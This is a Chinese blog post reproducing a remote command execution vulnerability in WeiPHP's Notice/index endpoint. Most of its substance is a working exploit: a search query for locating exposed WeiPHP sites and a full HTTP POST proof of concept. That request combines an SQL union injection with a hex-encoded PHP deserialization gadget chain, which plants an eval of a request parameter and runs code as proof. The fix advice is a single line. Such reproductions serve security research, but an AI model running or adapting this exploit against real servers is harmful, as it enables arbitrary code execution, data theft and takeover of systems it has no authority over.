WeiPHP Notice/index接口处存在RCE漏洞

于 2024-03-14 16:48:55 发布
阅读量248 收藏 2
点赞数 10
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/136715302
版权

产品介绍

WeiPHP是一款基于PHP开发的开源微信公众号开发框架。它提供了丰富的功能和易于使用的接口,使开发者能够快速构建和管理微信公众号应用。WeiPHP支持自定义菜单、消息管理、用户管理、素材管理、支付接口等功能,同时还提供了插件机制和模块化开发,方便扩展和定制。WeiPHP是一个成熟的框架,被广泛应用于微信公众号开发领域。

漏洞描述

WeiPHP Notice/index接口处存在远程命令执行漏洞。攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实现在目标系统上执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统上执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。

资产测绘

body=“/css/weiphp.css” || title=“weiphp” || title=“weiphp4.0”

漏洞复现

Poc:

POST /public/index.php/weixin/Notice/index?img=echo+md5(123);exit(); HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15
Content-Length: 1340
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: close

<xml>
<product_id>aaaa</product_id>
<appid>exp</appid>
<appid>=0) union select 1,2,3,4,5,6,7,0x4f3a32373a227468696e6b5c70726f636573735c70697065735c57696e646f7773223a313a7b733a33343a22007468696e6b5c70726f636573735c70697065735c57696e646f77730066696c6573223b613a313a7b693a303b4f3a31373a227468696e6b5c6d6f64656c5c5069766f74223a323a7b733a393a22002a00617070656e64223b613a313a7b733a333a226c696e223b613a313a7b693a303b733a323a223131223b7d7d733a31373a22007468696e6b5c4d6f64656c0064617461223b613a313a7b733a333a226c696e223b4f3a31333a227468696e6b5c52657175657374223a353a7b733a373a22002a00686f6f6b223b613a323a7b733a373a2276697369626c65223b613a323a7b693a303b723a383b693a313b733a353a226973436769223b7d733a363a22617070656e64223b613a323a7b693a303b723a383b693a313b733a363a226973416a6178223b7d7d733a393a22002a0066696c746572223b613a313a7b693a303b613a323a7b693a303b4f3a32313a227468696e6b5c766965775c6472697665725c506870223a303a7b7d693a313b733a373a22646973706c6179223b7d7d733a393a22002a00736572766572223b733a313a2231223b733a393a22002a00636f6e666967223b613a313a7b733a383a227661725f616a6178223b733a333a22696d67223b7d733a363a22002a00676574223b613a313a7b733a333a22696d67223b733a33303a223c3f70687020406576616c28245f524551554553545b27696d67275d293b223b7d7d7d7d7d7d,9,10,11,12-- </appid>
<mch_id>aaa</mch_id>
<nonce_str>aaa</nonce_str>
<openid>aaa</openid>
</xml>

命令打印"123"md5加密的值:
在这里插入图片描述

修复建议

联系软件厂商升级至最新安全版本。

keepb1ue
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WeiPHP5.0远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-12 750
weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。
weiphp5.0存在远程代码执行漏洞
最新发布
nnn2188185的博客
03-11 158
weiphp5.0存在远程代码执行漏洞
微信开发学习日记(五):weiphp开源框架的bug,公众号权限编辑问题
weixin_30867015的博客
04-14 123
最近在研究weiphp,总体感觉还行,bug据说还挺多。这不,我就遇到一个比较严重影响使用的。感觉不太应该出现这么严重的bug啊。 weiphp的微信公众号等级,权限增加和编辑bug,看不到权限列表,只能看到“好人”和“环境”2个不正确的插件名称。[系统BUG] 用户权限无法正常显示问题描述:用户->公众号等级->编辑 出现好人与环境两个插件解决办法:后台新增加公众帐号等级错误...
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
weixin_68999845的博客
09-21 522
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
WeiPHP 微信开发平台 SQL注入漏洞复现
0xSec
12-05 936
weiphp微信开发平台 _send_by_group、wp_where、 get_package_template等接口处存在SQL注入漏洞,攻击者利用此漏洞可获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
weiphp微信公众平台框架 v3.0 正式版
12-10
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。
weiphp框架
01-14
weiphp
weiphp微信公众平台授权设置
01-20
weiphp后台使用设置 实现在用户授权时候显示公众号的名字以及分享使用该服务号 使用步骤 1:在weiphp后台打开公众号管理-新增 2:输入公众号名字,原始ID,微信号 3:在这里公众号能查找到 4: 输入完成之后下一步,他会...
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
08-03
Weiphp5.0 CMS是中国知名的开源内容管理系统,然而,最近发现了一个EXP表达式注入漏洞,该漏洞存在Weiphp5.0 CMS的Index控制器的bind_follow方法中。该方法使用了ThinkPHP框架的Db类来执行数据库查询,然而,在wp_...
WEIPHP 4 欢迎语BUG:如果是多图文,则所有文章都显示第一篇
zhizhuo0915的博客
01-28 341
1/打开\Application\Home\Model\WeixinModel.class.php  2大约在301行,在此处加上 $art = [];
curl
csdn_jiangpeng的博客
01-16 205
/** * get * post方式请求资源 * @param string $url 基于的baseUrl * @param int $flag 标志位 * @param array $header 头部 * @return string 返回的资源内容 */ function curl_get($url, $flag = 0, $header = []) {...
攻防世界--weiphp
qq_46263951的博客
01-19 1347
这道题原本应该是通过.git源码泄漏获取到源码,利用工具githack,可能是环境的问题,执行完发现目录是空的 直接从网上找源码,可能比源代码的内容要多一些 GitHub - weiphpdev/weiphp5.0: WeiPHP5.0,公众号与小程序结合的最佳开发框架,,它实现一个后台同时管理和运营多个客户端(公众号,微信小程序,后续将支持支付宝小程序,百度小程序等) 进入后的页面为一个登陆框,将login改为register发现该功能被禁用了 前台SQL注入 由于这里对title参数并没有检.
MetInfo 3.0 PHP代码注入漏洞(getshell)
kendyhj9999的专栏
05-29 1498
MetInfo 3.0 PHP代码注入漏洞(getshell) 来源:本站转载 作者:佚名 时间:2010-11-07 TAG: 我要投稿 官网:http://www.metinfo.cn/ 关键字:"Powered by MetInfo 3.0 "  来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm
[代码审计]Weiphp5.0 前台文件任意读取分析
Y4tacker的博客
05-09 1291
文章目录前言分析 前言 最近一直在刷CNVD吧,大概两周刷了四页多,感觉自己水平也在见着长高,今天来分析一下Weiphp,毕竟也很久没写过博客了 分析 漏洞所在的函数为application/material/controller/Material.php下的_download_imgage函数,正好这是一个public方法,根据thinkphp的路由规则我们不难得到传参方式,这里直接先给出exp然后继续分析好吧 http://ddcms.top//public/index.php/material/Ma
Weiphp框架
foyuebukeshuo的专栏
03-30 181
Weiphp这个框架使用方法 weiphp这个框架,安全性,对这方面不太熟悉,有没有熟练的大神可以交流下? 因为今天查看了一个微信APP 钱耳朵上的 相关后台数据,发现诸多漏洞,作为一个互联网金融的平台,对公众粉丝的资金处境很是危险。 今天已经在其平台善意留言提醒。
web安全(6)-- 任意文件上传漏洞
热门推荐
TaneRoom的博客
11-21 1万+
上传漏洞这个顾名思义,就是攻击者通过上传木马文件,直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。 导致该漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。
WeiPHP + Natapp微信公众号调试环境笔记
搬砖之路的专栏
02-25 953
第一部分 说明      微信公众号开发必须有服务器,针对所有的开发接口的调试都需要打通从粉丝微信发起请求到腾讯的微信服务器再到公众号的服务器,所以搭建一个外网可访问的环境很重要。       刚开始试图去找一个免费的云服务器、ECS之类的环境,可是找了很久没找到,最后决定使用Natapp做外网映射来进行调试和接口验证。第二部分 调试笔记第一节 WeiPHP        关于WeiPHP相关的说...
weiphp移植PHP7.0过程
搬砖之路的专栏
03-10 506
第一个坑Call to undefined function Think\simplexml_load_string()simplexml扩展包的问题,需要安装扩展包sudo apt-get install php7.0-xml第二个坑_STORAGE_WRITE_ERROR_:./Runtime/Cache/Install路径权限的问题,需要设置跟目录权限可写,这个错误是由于创建Runtime目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值